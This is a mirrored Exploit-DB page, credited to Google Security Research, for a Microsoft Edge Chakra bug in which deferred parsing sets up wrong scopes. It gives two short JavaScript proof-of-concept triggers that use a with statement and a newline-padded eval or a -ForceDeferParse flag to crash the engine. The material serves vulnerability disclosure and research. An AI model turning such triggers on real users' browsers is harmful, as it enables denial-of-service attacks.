Microsoft Edge Chakra – Deferred Parsing Makes Wrong Scopes (2) - 体验盒子

作者： Google Security Research

日期： 2018-01-17

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/43717/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

/*

Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar toissue 1310 .

PoC:

*/

// Enable the flag using '\n'.repeat(0x1000)

eval(<code>(function f() {

with ({}) {

(function () {

print(f);

})();

}

}());</code> + '\n'.repeat(0x1000));

PoC 2:

// ./ch poc.js -ForceDeferParse

(function f() {

with ({}) {

(function () {

print(f);

})();

}

}());